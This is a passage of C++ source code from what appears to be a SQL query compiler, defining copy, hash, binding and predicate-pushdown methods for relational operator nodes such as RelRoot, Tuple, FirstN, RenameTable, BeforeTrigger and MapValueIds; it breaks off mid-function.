  result->allOrderByRefsInGby_ = allOrderByRefsInGby_;
  result->avoidHalloween_ = avoidHalloween_;
  result->disableESPParallelism_ = disableESPParallelism_;
  result->containsOnStatementMV_ = containsOnStatementMV_;
  result->hasOlapFunctions_ = hasOlapFunctions_;
  result->containsLRU_ = containsLRU_;
  result->isAnalyzeOnly_ = isAnalyzeOnly_;
  result->hasMandatoryXP_ = hasMandatoryXP_ ;

  if (partitionByTree_ != NULL)
    result->partitionByTree_ = partitionByTree_->copyTree(outHeap)->castToItemExpr();

  result->partReqType_ = partReqType_ ;
  result->isQueryNonCacheable_ = isQueryNonCacheable_;
  result->firstNRowsParam_ = firstNRowsParam_;
  result->flags_ = flags_;

  return RelExpr::copyTopNode(result, outHeap);
}

// Append an item to the (unbound) select-list tree.
void RelRoot::addCompExprTree(ItemExpr *compExpr)
{
  ExprValueId c = compExprTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(compExpr);
  compExprTree_ = c.getPtr();
}

// Detach and return the select-list tree.
ItemExpr * RelRoot::removeCompExprTree()
{
  ItemExpr * result = compExprTree_;
  compExprTree_ = NULL;
  return result;
}

// Append an item to the (unbound) predicate tree.
void RelRoot::addPredExprTree(ItemExpr *predExpr)
{
  ExprValueId c = predExprTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(predExpr);
  predExprTree_ = c.getPtr();
}

// Detach and return the predicate tree.
ItemExpr * RelRoot::removePredExprTree()
{
  ItemExpr * result = predExprTree_;
  predExprTree_ = NULL;
  return result;
}

// Append an input host variable to the input-variable tree.
void RelRoot::addInputVarTree(ItemExpr *inputVar)
{
  ExprValueId c = inputVarTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(inputVar);
  inputVarTree_ = c.getPtr();
}

// Prepend an input host variable to the input-variable tree.
void RelRoot::addAtTopOfInputVarTree(ItemExpr *inputVar)
{
  ExprValueId c = inputVarTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insertAtTop(inputVar);
  inputVarTree_ = c.getPtr();
}

// Detach and return the input-variable tree.
ItemExpr * RelRoot::removeInputVarTree()
{
  ItemExpr * result = inputVarTree_;
  inputVarTree_ = NULL;
  return result;
}

// Append an output host variable by walking to the end of the ItemList
// chain (right child) and attaching a new list node there.
void RelRoot::addOutputVarTree(ItemExpr *outputVar)
{
  if (!outputVarTree_)
    {
      outputVarTree_ = new(CmpCommon::statementHeap()) ItemList(outputVar, NULL);
    }
  else
    {
      ItemExpr *start = outputVarTree_;
      while (start->child(1))
        {
          start = start->child(1);
        }
      start->child(1) = new(CmpCommon::statementHeap()) ItemList(outputVar, NULL);
    }
}

// Used by Assignment Statement in a Compound Statement.
// It adds a host variable to assignmentStTree_.
void RelRoot::addAssignmentStTree(ItemExpr *inputOutputVar)
{
  if (!assignmentStTree_)
    {
      assignmentStTree_ = new(CmpCommon::statementHeap()) ItemList(inputOutputVar, NULL);
    }
  else
    {
      ItemExpr *start = assignmentStTree_;
      while (start->child(1))
        {
          start = start->child(1);
        }
      start->child(1) = new(CmpCommon::statementHeap()) ItemList(inputOutputVar, NULL);
    }
}

// Detach and return the output-variable tree.
ItemExpr * RelRoot::removeOutputVarTree()
{
  ItemExpr * result = outputVarTree_;
  outputVarTree_ = NULL;
  return result;
}

// Append an item to the ORDER BY tree.
void RelRoot::addOrderByTree(ItemExpr *orderBy)
{
  ExprValueId c = orderByTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(orderBy);
  orderByTree_ = c.getPtr();
}

// Detach and return the ORDER BY tree.
ItemExpr * RelRoot::removeOrderByTree()
{
  ItemExpr * result = orderByTree_;
  orderByTree_ = NULL;
  return result;
}

// Append an item to the PARTITION BY tree.
void RelRoot::addPartitionByTree(ItemExpr *partBy)
{
  ExprValueId c = partitionByTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(partBy);
  partitionByTree_ = c.getPtr();
}

// Detach and return the PARTITION BY tree.
ItemExpr * RelRoot::removePartitionByTree()
{
  ItemExpr * result = partitionByTree_;
  partitionByTree_ = NULL;
  return result;
}

// Append an item to the update-column tree.
void RelRoot::addUpdateColTree(ItemExpr *updateCol)
{
  ExprValueId c = updateColTree_;
  ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(updateCol);
  updateColTree_ = c.getPtr();
}

// Detach and return the update-column tree.
ItemExpr * RelRoot::removeUpdateColTree()
{
  ItemExpr * result = updateColTree_;
  updateColTree_ = NULL;
  return result;
}

// Collect this node's local expressions (and their display labels) for
// GUI/debug display; each expression is reported as either the unbound
// tree or the bound value list, whichever is current.
void RelRoot::addLocalExpr(LIST(ExprNode *) &xlist,
                           LIST(NAString) &llist) const
{
  if (compExprTree_ != NULL OR
      compExpr_.entries() == 0)
    xlist.insert(compExprTree_);
  else
    xlist.insert(compExpr_.rebuildExprTree(ITM_ITEM_LIST));
  llist.insert("select_list");

  if (inputVarTree_ != NULL OR
      inputVars_.entries() > 0)
    {
      if (inputVars_.entries() == 0)
        xlist.insert(inputVarTree_);
      else
        xlist.insert(inputVars_.rebuildExprTree(ITM_ITEM_LIST));
      llist.insert("input_variables");
    }

  if (orderByTree_ != NULL OR
      reqdOrder_.entries() > 0)
    {
      if (reqdOrder_.entries() == 0)
        xlist.insert(orderByTree_);
      else
        xlist.insert(reqdOrder_.rebuildExprTree(ITM_ITEM_LIST));
      llist.insert("order_by");
    }

  if ((partitionByTree_ != NULL) OR
      (partArrangement_.entries() > 0))
    {
      if (partArrangement_.entries() == 0)
        xlist.insert(partitionByTree_);
      else
        xlist.insert(partArrangement_.rebuildExprTree(ITM_ITEM_LIST));
      llist.insert("partition_by");
    }

  if (updateColTree_ != NULL OR
      updateCol_.entries() > 0)
    {
      if (updateCol_.entries() == 0)
        xlist.insert(updateColTree_);
      else
        xlist.insert(updateCol_.rebuildExprTree(ITM_ITEM_LIST));
      llist.insert("update_col");
    }

  if (reqdShape_ != NULL)
    {
      xlist.insert(reqdShape_);
      llist.insert("must_match");
    }

  RelExpr::addLocalExpr(xlist,llist);
}

//----------------------------------------------------------------------------
//++ MV OZ
NABoolean RelRoot::hasMvBindContext() const
{
  return (NULL != pMvBindContextForScope_) ? TRUE : FALSE;
}

MvBindContext * RelRoot::getMvBindContext() const
{
  return pMvBindContextForScope_;
}

void RelRoot::setMvBindContext(MvBindContext * pMvBindContext)
{
  pMvBindContextForScope_ = pMvBindContext;
}

// Wrap every select-list item in a ONEROW aggregate and insert a scalar
// GroupByAgg between the root and its child, unless an equivalent scalar
// aggregate already enforces the one-row property.
void RelRoot::addOneRowAggregates(BindWA* bindWA)
{
  RelExpr * childOfRoot = child(0);
  GroupByAgg *aggNode = NULL;
  // If the One Row Subquery is already enforced by a scalar aggregate
  // then we do not need to add an additional one row aggregate. The exceptions to
  // this rule is if we have count(t1.a) where t1 itself is a one row subquery.
  // Note that the count is needed in order to have a groupby below the root node.
  // See soln. 10-071105-8680
  // Another exception is when the select list has say max(a) + select a from t1
  // In this case there is a onerowsubquery in the select list but it is a child
  // of BiArith. Due to all these exceptions we are simply going to scan the select
  // list. As soon as we find something other than an aggregate we take the safe
  // way out and add a one row aggregate.
  // Also if the groupby is non scalar then we need to add a one row aggregate.
  // Also if we have select max(a) + select b from t1 from t2;
  if (childOfRoot->getOperatorType() == REL_GROUPBY)
  {
    aggNode = (GroupByAgg *)childOfRoot;

    if (!aggNode->groupExpr().isEmpty())
      aggNode = NULL;

    // Check to see if the compExpr contains a subquery.
    for (CollIndex i=0; i < compExpr().entries(); i++)
      if (compExpr()[i].getItemExpr()->containsOpType(ITM_ROW_SUBQUERY))
      {
        aggNode = NULL ;
        break;
      }
  }

  if (aggNode)
    return ;

  const RETDesc *oldTable = getRETDesc();
  RETDesc *resultTable = new(bindWA->wHeap()) RETDesc(bindWA);

  // Transform select list such that that each item has a oneRow parent.
  for (CollIndex selectListIndex=0;
       selectListIndex < compExpr().entries();
       selectListIndex++)
  {
    ItemExpr *colExpr = compExpr()[selectListIndex].getItemExpr();

    // Build a new OneRow aggregate on top of the existing expression.
    ItemExpr *newColExpr = new(bindWA->wHeap())
      Aggregate(ITM_ONEROW, colExpr);

    newColExpr->bindNode(bindWA);

    ColumnNameMap *xcnmEntry = oldTable->findColumn(compExpr()[selectListIndex]);

    if (xcnmEntry)  // ## I don't recall when this case occurs...
      resultTable->addColumn(bindWA,
                             xcnmEntry->getColRefNameObj(),
                             newColExpr->getValueId(),
                             USER_COLUMN,
                             xcnmEntry->getColumnDesc()->getHeading());
    else
    {
      ColRefName colRefName;
      resultTable->addColumn(bindWA,
                             colRefName,
                             newColExpr->getValueId());
    }

    // Replace the select list expression with the new one.
    compExpr()[selectListIndex] = newColExpr->getValueId();
  }

  ValueIdSet aggregateExpr(compExpr()) ;
  GroupByAgg *newGrby = NULL;
  newGrby = new(bindWA->wHeap()) GroupByAgg(childOfRoot, aggregateExpr);
  newGrby->bindNode(bindWA) ;
  child(0) = newGrby ;

  // Set the return descriptor
  //
  setRETDesc(resultTable);
}

// -----------------------------------------------------------------------
// member functions for class PhysicalRelRoot
// -----------------------------------------------------------------------
NABoolean PhysicalRelRoot::isLogical() const
{
  return FALSE;
}

NABoolean PhysicalRelRoot::isPhysical() const
{
  return TRUE;
}

// -----------------------------------------------------------------------
// methods for class Tuple
// -----------------------------------------------------------------------
THREAD_P Lng32 Tuple::idCounter_(0);

// Copy constructor: copies predicates, the tuple expression (tree and
// bound list), the reject predicates, and the node id.
Tuple::Tuple(const Tuple & other) : RelExpr(other.getOperatorType())
{
  selectionPred() = other.getSelectionPred();
  tupleExprTree_ = other.tupleExprTree_;
  tupleExpr_ = other.tupleExpr_;
  rejectPredicates_ = other.rejectPredicates_;
  id_ = other.id_;
}

Tuple::~Tuple() {}

Int32 Tuple::getArity() const
{
  return 0;
}

// -----------------------------------------------------------------------
// A virtual method for computing output values that an operator can
// produce potentially.
// ----------------------------------------------------------------------- void Tuple::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); outputValues.insertList( tupleExpr() ); } // Tuple::getPotentialOutputValues() HashValue Tuple::topHash() { HashValue result = RelExpr::topHash(); result ^= tupleExpr_.entries(); return result; } NABoolean Tuple::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; Tuple &o = (Tuple &) other; if (NOT (tupleExpr_ == o.tupleExpr_)) return FALSE; if (NOT (id_ == o.id_)) return FALSE; return TRUE; } RelExpr * Tuple::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Tuple *result; if (derivedNode == NULL) result = new (outHeap) Tuple(NULL,outHeap); else result = (Tuple *) derivedNode; if (tupleExprTree_ != NULL) result->tupleExprTree_ = tupleExprTree_->copyTree(outHeap)->castToItemExpr(); result->tupleExpr_ = tupleExpr_; result->id_ = id_; return RelExpr::copyTopNode(result, outHeap); } void Tuple::addTupleExprTree(ItemExpr *tupleExpr) { ExprValueId t = tupleExprTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(tupleExpr); tupleExprTree_ = t.getPtr(); } ItemExpr * Tuple::removeTupleExprTree() { ItemExpr * result = tupleExprTree_; tupleExprTree_ = NULL; return result; } void Tuple::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (tupleExprTree_ != NULL OR NOT tupleExpr_.isEmpty()) { if(tupleExpr_.isEmpty()) xlist.insert(tupleExprTree_); else xlist.insert(tupleExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("tuple_expr"); } RelExpr::addLocalExpr(xlist,llist); } const NAString Tuple::getText() const { NAString tmp("values ", CmpCommon::statementHeap()); if (tupleExprTree()) tupleExprTree()->unparse(tmp); else ((ValueIdList &)tupleExpr()).unparse(tmp); return tmp; } // ----------------------------------------------------------------------- // methods for class TupleList // 
----------------------------------------------------------------------- TupleList::TupleList(const TupleList & other) : Tuple(other) { castToList_ = other.castToList_; createdForInList_ = other.createdForInList_; } RelExpr * TupleList::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { TupleList *result; if (derivedNode == NULL) result = new (outHeap) TupleList(NULL,outHeap); else result = (TupleList *) derivedNode; result->castToList() = castToList(); return Tuple::copyTopNode(result, outHeap); } void TupleList::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { Tuple::addLocalExpr(xlist,llist); } const NAString TupleList::getText() const { NAString tmp("TupleList",CmpCommon::statementHeap()); return tmp; } // ----------------------------------------------------------------------- // member functions for class PhysicalTuple // ----------------------------------------------------------------------- NABoolean PhysicalTuple::isLogical() const { return FALSE; } NABoolean PhysicalTuple::isPhysical() const { return TRUE; } // ----------------------------------------------------------------------- // Member functions for class FirstN // ----------------------------------------------------------------------- RelExpr * FirstN::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { FirstN *result; if (derivedNode == NULL) { result = new (outHeap) FirstN(NULL, getFirstNRows(), isFirstN(), getFirstNRowsParam(), outHeap); result->setCanExecuteInDp2(canExecuteInDp2()); } else result = (FirstN *) derivedNode; result->reqdOrder().insert(reqdOrder()); return RelExpr::copyTopNode(result, outHeap); } const NAString FirstN::getText() const { NAString result(CmpCommon::statementHeap()); result = "FirstN"; return result; } // helper method to determine if we have a child Fisrt N node that can execute in Dp2. // This method will only search nodes with one child. We do not expect the child First N // to occur below a join or union type node. 
This method will unwind as soon as the first // FirstN child is found. static NABoolean haveChildFirstNInDp2 (RelExpr * node) { if (node->getArity() != 1) return FALSE; if (node->child(0)) { if (node->child(0)->getOperatorType() == REL_FIRST_N) { // child is FirstN FirstN * innerFirstN = (FirstN *) node->child(0)->castToRelExpr(); if (innerFirstN->canExecuteInDp2()) return TRUE; else return FALSE; } else { // have child but it is not FirstN return (haveChildFirstNInDp2(node->child(0))); } } else return FALSE; // no child even though arity is 1! } RelExpr * FirstN::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (bindWA->isEmbeddedIUDStatement() && haveChildFirstNInDp2(this)) { setCanExecuteInDp2(TRUE); } return RelExpr::bindNode(bindWA); } NABoolean FirstN::computeRowsAffected() const { if (child(0)) { return child(0)->castToRelExpr()->computeRowsAffected(); } return FALSE; } // member functions for class Filter // ----------------------------------------------------------------------- Filter::~Filter() {} Int32 Filter::getArity() const { return 1; } HashValue Filter::topHash() { HashValue result = RelExpr::topHash(); return result; } NABoolean Filter::duplicateMatch(const RelExpr & other) const { return RelExpr::duplicateMatch(other); } RelExpr * Filter::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Filter *result; if (derivedNode == NULL) result = new (outHeap) Filter(NULL, outHeap); else result = (Filter *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } void Filter::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); outputValues += child(0)->getGroupAttr()->getCharacteristicOutputs(); } // Filter::getPotentialOutputValues() const NAString Filter::getText() const { return "filter"; } // ----------------------------------------------------------------------- // member functions for class Rename // 
// -----------------------------------------------------------------------

Rename::~Rename() {}

// A Rename node always has exactly one child.
Int32 Rename::getArity() const { return 1; }

// Rename is a parser-only node; hashing is not supported.
HashValue Rename::topHash()
{
  ABORT("Hash functions can't be called in the parser");
  return 0x0;
}

// Rename is a parser-only node; duplicate matching is not supported.
NABoolean Rename::duplicateMatch(const RelExpr & /* other */) const
{
  ABORT("Duplicate match doesn't work in the parser");
  return FALSE;
}

// -----------------------------------------------------------------------
// member functions for class RenameTable
// -----------------------------------------------------------------------

RenameTable::~RenameTable() {}

const NAString RenameTable::getText() const
{
  return ("rename_as " + newTableName_.getCorrNameAsString());
}

// Copy this node: the new-column-names tree is deep-copied, the view
// NATable pointer is shared.
RelExpr * RenameTable::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  RenameTable *result;

  if (derivedNode == NULL)
    result = new (outHeap) RenameTable(TRUE, NULL, newTableName_, NULL, outHeap);
  else
    result = (RenameTable *) derivedNode;

  if (newColNamesTree_ != NULL)
    result->newColNamesTree_ = newColNamesTree_->copyTree(outHeap)->castToItemExpr();

  if (viewNATable_ != NULL)
    result->viewNATable_ = viewNATable_;

  return RelExpr::copyTopNode(result, outHeap);
}

// Detach and return the column-name tree; the node gives up ownership.
ItemExpr * RenameTable::removeColNameTree()
{
  ItemExpr * result = newColNamesTree_;

  newColNamesTree_ = NULL;
  return result;
}

void RenameTable::addLocalExpr(LIST(ExprNode *) &xlist,
                               LIST(NAString) &llist) const
{
  xlist.insert(newColNamesTree_);
  llist.insert("new_col_names");
  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// member functions for class RenameReference
// -----------------------------------------------------------------------

RenameReference::~RenameReference() {}

// Display text includes the names of all referenced tables.
const NAString RenameReference::getText() const
{
  NAString text("rename_ref");

  for (CollIndex i=0; i<tableReferences_.entries(); i++)
    text += " " + tableReferences_[i].getRefName();

  return text;
}

RelExpr * RenameReference::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  RenameReference *result;

  if (derivedNode == NULL)
  {
    // copy the table reference list into the target heap
    TableRefList *tableRef = new(outHeap) TableRefList(tableReferences_);
    result = new (outHeap) RenameReference(NULL, *tableRef, outHeap);
  }
  else
    result = (RenameReference *) derivedNode;

  return RelExpr::copyTopNode(result, outHeap);
}

// No local expressions beyond those of the base class.
void RenameReference::addLocalExpr(LIST(ExprNode *) &xlist,
                                   LIST(NAString) &llist) const
{
  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// member functions for class BeforeTrigger
// -----------------------------------------------------------------------

BeforeTrigger::~BeforeTrigger() {}

// Arity is 0 until a child is attached, then 1.
Int32 BeforeTrigger::getArity() const
{
  if (child(0) == NULL)
    return 0;
  else
    return 1;
}

const NAString BeforeTrigger::getText() const
{
  NAString text("before_trigger: ");

  if (signal_)
    text += "Signal";
  else
    text += "Set";

  return text;
}

// Copy this node; a BeforeTrigger carries either a SIGNAL clause or a
// list of SET clauses, both of which are deep-copied.
RelExpr * BeforeTrigger::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  BeforeTrigger *result;

  if (derivedNode == NULL)
  {
    TableRefList *tableRef = new(outHeap) TableRefList(tableReferences_);
    ItemExpr *whenClause = NULL;

    if (whenClause_ != NULL)
      whenClause = whenClause_->copyTree(outHeap);

    if (isSignal_)
    {
      RaiseError *signalClause = (RaiseError *)signal_->copyTree(outHeap);
      result = new (outHeap) BeforeTrigger(*tableRef, whenClause, signalClause, outHeap);
    }
    else
    {
      CMPASSERT(setList_ != NULL); // Must have either SET or SIGNAL clause.
      ItemExprList *setList = new(outHeap) ItemExprList(setList_->entries(), outHeap);
      for (CollIndex i=0; i<setList_->entries(); i++)
        setList->insert(setList_->at(i)->copyTree(outHeap));

      result = new (outHeap) BeforeTrigger(*tableRef, whenClause, setList, outHeap);
    }
  }
  else
    result = (BeforeTrigger *) derivedNode;

  return RelExpr::copyTopNode(result, outHeap);
}

// Expose the WHEN clause and either the SIGNAL clause or each SET
// clause for display.
void BeforeTrigger::addLocalExpr(LIST(ExprNode *) &xlist,
                                 LIST(NAString) &llist) const
{
  if (whenClause_ != NULL)
  {
    llist.insert("WHEN clause");
    xlist.insert(whenClause_);
  }

  if (signal_)
  {
    llist.insert("SIGNAL clause");
    xlist.insert(signal_);
  }
  else
  {
    // NOTE(review): setList_ is dereferenced without a NULL check here;
    // presumably the constructor guarantees SET xor SIGNAL — confirm.
    for (CollIndex i=0; i<setList_->entries(); i++)
    {
      llist.insert("SET clause");
      xlist.insert(setList_->at(i));
    }
  }

  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// member functions for class MapValueIds
// -----------------------------------------------------------------------

MapValueIds::~MapValueIds() { }

Int32 MapValueIds::getArity() const { return 1; }

void MapValueIds::pushdownCoveredExpr(
     const ValueIdSet & outputExpr,
     const ValueIdSet & newExternalInputs,
     ValueIdSet & predicatesOnParent,
     const ValueIdSet * setOfValuesReqdByParent,
     Lng32 childIndex)
{
  // ---------------------------------------------------------------------
  // Since the MapValueIds node rewrites predicates, the characteristic
  // outputs of the node usually make no sense to the child node. For
  // this reason, translate the characteristic outputs of this node before
  // passing them down to the children.
  // ---------------------------------------------------------------------

  ValueIdSet requiredValues;
  if (setOfValuesReqdByParent)
    requiredValues = *setOfValuesReqdByParent;
  ValueIdSet translatedOutputs;
  ValueIdSet predsRewrittenForChild;
  ValueIdSet outputValues(outputExpr);

  // first subtract the outputs from the required values, then add back
  // the translated outputs
  outputValues -= getGroupAttr()->getCharacteristicOutputs();
  getMap().rewriteValueIdSetDown(getGroupAttr()->getCharacteristicOutputs(),
                                 translatedOutputs);
  outputValues += translatedOutputs;

  // same translation for the required values
  translatedOutputs.clear();
  requiredValues -= getGroupAttr()->getCharacteristicOutputs();
  getMap().rewriteValueIdSetDown(getGroupAttr()->getCharacteristicOutputs(),
                                 translatedOutputs);
  requiredValues += translatedOutputs;

  if (cseRef_)
  {
    // If this MapValueIds node represents a common subexpression,
    // then don't try to push predicates again that already have
    // been pushed down before. VEGPredicates may not be pushable
    // at all to the rewritten child, and other predicates might
    // be duplicated with different ValueIds for the internal
    // operators such as "=", "+", ">".
    predicatesOnParent -= cseRef_->getPushedPredicates();

    // Also, don't push down VEGPredicates on columns that are
    // characteristic outputs of the MapValueIds. Those predicates
    // (or their equivalents) should have already been pushed down.
    for (ValueId g=predicatesOnParent.init();
         predicatesOnParent.next(g);
         predicatesOnParent.advance(g))
      if (g.getItemExpr()->getOperatorType() == ITM_VEG_PREDICATE)
      {
        VEG *veg = static_cast<VEGPredicate *>(g.getItemExpr())->getVEG();
        ValueId vegRef(veg->getVEGReference()->getValueId());

        if (newExternalInputs.contains(vegRef))
        {
          // We are trying to push down a VEGPred and we are at
          // the same time offering the VEGRef as a new
          // characteristic input. Example: We want to push
          // VEGPred_2(a=b) down and we offer its corresponding
          // VEGRef_1(a,b) as an input. The map in our
          // MapValueIds node maps VEGRef_1(a,b) on the top to
          // VEGRef_99(x,y) on the bottom. Note that either one
          // of the VEGies might contain a constant that the
          // other one doesn't contain. Note also that the
          // MapValueIds node doesn't map characteristic inputs,
          // those are passed unchanged to the child. So, we need
          // to generate a predicate for the child that:
          // a) represents the semantics of VEGPred_2(a,b)
          // b) compares the new characteristic input
          //    VEGRef_1(a,b) with some value in the child
          // c) doesn't change the members of the existing
          //    VEGies.
          // The best solution is probably an equals predicate
          // between the characteristic input and the VEGRef
          // (or other expression) that is the child's equivalent.
          // Example: VEGRef_1(a,b) = VEGRef_99(x,y)
          ValueId bottomVal;
          ItemExpr *eqPred = NULL;

          map_.mapValueIdDown(vegRef, bottomVal);

          if (vegRef != bottomVal && bottomVal != NULL_VALUE_ID)
          {
            eqPred = new(CmpCommon::statementHeap()) BiRelat(
                 ITM_EQUAL,
                 vegRef.getItemExpr(),
                 bottomVal.getItemExpr(),
                 veg->getSpecialNulls());
            eqPred->synthTypeAndValueId();
            // replace g with the new equals predicate
            // when we do the actual rewrite below
            map_.addMapEntry(g, eqPred->getValueId());
          }
        }
        else
        {
          // Don't push down VEGPredicates on columns that are
          // characteristic outputs of the MapValueIds. Those
          // predicates (or their equivalents) should have
          // already been pushed down.
          ValueIdSet vegMembers(veg->getAllValues());

          vegMembers += vegRef;
          vegMembers.intersectSet(
               getGroupAttr()->getCharacteristicOutputs());
          if (!vegMembers.isEmpty())
          {
            // a VEGPred on one of my characteristic outputs,
            // assume that my child tree already has the
            // associated VEGPreds and remove this predicate
            // silently
            predicatesOnParent -= g;
          }
          // else leave the predicate and let the code below deal
          // with it, this will probably end up in a failed assert
          // below for predsRewrittenForChild.isEmpty()
        }
      }
  }

  // rewrite the predicates so they can be applied in the child node
  getMap().rewriteValueIdSetDown(predicatesOnParent,predsRewrittenForChild);

  // use the standard method with the new required values
  RelExpr::pushdownCoveredExpr(outputValues,
                               newExternalInputs,
                               predsRewrittenForChild,
                               &requiredValues,
                               childIndex);

  // eliminate any VEGPredicates that got duplicated in the parent
  if (NOT child(0)->isCutOp())
    predsRewrittenForChild -= child(0)->selectionPred();

  // all predicates must have been pushed down!!
  CMPASSERT(predsRewrittenForChild.isEmpty());
  predicatesOnParent.clear();

  // Remove entries from the map that are no longer required since
  // they no longer appear in the outputs.
  NABoolean matchWithTopValues = FALSE;
  if (child(0)->isCutOp() ||
      child(0)->getOperatorType() == REL_FILTER ||
      child(0)->getOperatorType() == REL_MAP_VALUEIDS )
  {
    matchWithTopValues = TRUE;
    getMap().removeUnusedEntries(getGroupAttr()->getCharacteristicOutputs(),
                                 matchWithTopValues);
  }
  else
  {
    getMap().removeUnusedEntries(child(0)->getGroupAttr()->getCharacteristicOutputs(),
                                 matchWithTopValues);
  }
} // MapValueIds::pushdownCoveredExpr

void MapValueIds::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  //
  // The output of the MapValueId is given by the ValueIds
  // contained in the "upper" portion of a two-tiered mapping
  // table.
  //
  outputValues.insertList((getMap2()).getTopValues());
} // MapValueIds::getPotentialOutputValues()

// Add identity (top == bottom) map entries for each given value.
void MapValueIds::addSameMapEntries(const ValueIdSet & newTopBottomValues)
{
  for (ValueId x = newTopBottomValues.init();
       newTopBottomValues.next(x);
       newTopBottomValues.advance(x))
    addMapEntry(x,x);
}

// Expose both tiers of the map for display.
void MapValueIds::addLocalExpr(LIST(ExprNode *) &xlist,
                               LIST(NAString) &llist) const
{
  xlist.insert(map_.getTopValues().rebuildExprTree(ITM_ITEM_LIST));
  llist.insert("upper_values");
  xlist.insert(map_.getBottomValues().rebuildExprTree(ITM_ITEM_LIST));
  llist.insert("lower_values");
  RelExpr::addLocalExpr(xlist,llist);
}

// Fold both tiers of the map into the generic hash.
HashValue MapValueIds::topHash()
{
  HashValue result = RelExpr::topHash();

  result ^= map_.getTopValues();
  result ^= map_.getBottomValues();

  return result;
}

// Duplicates must agree on the favorite-MV flag, the common
// subexpression reference, and the full map.
NABoolean MapValueIds::duplicateMatch(const RelExpr & other) const
{
  if (NOT RelExpr::duplicateMatch(other))
    return FALSE;

  MapValueIds &o = (MapValueIds &) other;

  if (includesFavoriteMV_ != o.includesFavoriteMV_)
    return FALSE;

  if (cseRef_ != o.cseRef_)
    return FALSE;

  if (map_ != o.map_)
    return FALSE;

  return TRUE;
}

RelExpr * MapValueIds::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  MapValueIds *result;

  if (derivedNode == NULL)
    result = new (outHeap) MapValueIds(NULL,map_,outHeap);
  else
    result = static_cast<MapValueIds*>(derivedNode);

  result->includesFavoriteMV_ = includesFavoriteMV_;
  result->cseRef_ = cseRef_;

  return RelExpr::copyTopNode(result, outHeap);
}

const NAString MapValueIds::getText() const
{
  return "map_value_ids";
  // return "expr";
}

// -----------------------------------------------------------------------
// Member functions for class PhysicalMapValueIds
// -----------------------------------------------------------------------
NABoolean PhysicalMapValueIds::isLogical() const { return FALSE; }

NABoolean PhysicalMapValueIds::isPhysical() const { return TRUE; }

// -----------------------------------------------------------------------
// Member functions for class Describe
// -----------------------------------------------------------------------
----------------------------------------------------------------------- RelExpr * Describe::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Describe *result; if (derivedNode == NULL) result = new (outHeap) Describe(originalQuery_, getDescribedTableName(), format_, labelAnsiNameSpace_); else result = (Describe *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } const NAString Describe::getText() const { return "describe"; } // ----------------------------------------------------------------------- // Member functions for class ProbeCache // ----------------------------------------------------------------------- NABoolean ProbeCache::isLogical() const { return FALSE; } NABoolean ProbeCache::isPhysical() const { return TRUE; } Int32 ProbeCache::getArity() const { return 1; } RelExpr * ProbeCache::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ProbeCache *result; if (derivedNode == NULL) result = new (outHeap) ProbeCache(NULL, numCachedProbes_, outHeap); else result = (ProbeCache *) derivedNode; result->numCachedProbes_ = numCachedProbes_; result->numInnerTuples_ = numInnerTuples_; return RelExpr::copyTopNode(result, outHeap); } const NAString ProbeCache::getText() const { return "probe_cache"; } // ----------------------------------------------------------------------- // Member functions for class ControlRunningQuery // ----------------------------------------------------------------------- NABoolean ControlRunningQuery::isLogical() const { return TRUE; } NABoolean ControlRunningQuery::isPhysical() const { return TRUE; } Int32 ControlRunningQuery::getArity() const { return 0; } RelExpr * ControlRunningQuery::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ControlRunningQuery *result = NULL; if (derivedNode == NULL) { switch (qs_) { case ControlNidPid: result = new (outHeap) ControlRunningQuery(nid_, pid_, ControlNidPid, action_, forced_, outHeap); break; case ControlPname: result = new (outHeap) ControlRunningQuery(pname_, 
ControlPname, action_, forced_, outHeap); break; case ControlQid: result = new (outHeap) ControlRunningQuery(queryId_, ControlQid, action_, forced_, outHeap); break; default: CMPASSERT(0); } result->setComment(comment_); } else result = (ControlRunningQuery *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } const NAString ControlRunningQuery::getText() const { return "control_running_query"; } void ControlRunningQuery::setComment(NAString &comment) { NAString cancelComment (comment, CmpCommon::statementHeap()); comment_ = cancelComment; } // ----------------------------------------------------------------------- // member functions for class CSEInfo (helper for CommonSubExprRef) // ----------------------------------------------------------------------- Int32 CSEInfo::getTotalNumRefs(Int32 restrictToSingleConsumer) const { // shortcut for main query if (cseId_ == CmpStatement::getCSEIdForMainQuery()) return 1; // Calculate how many times we will evaluate this common subexpression // at runtime: // - If the CSE is shared then we evaluate it once // - Otherwise, look at the consumers that are lexical refs // (avoid double-counting refs from multiple copies of a parent) // and add the times they are being executed. 
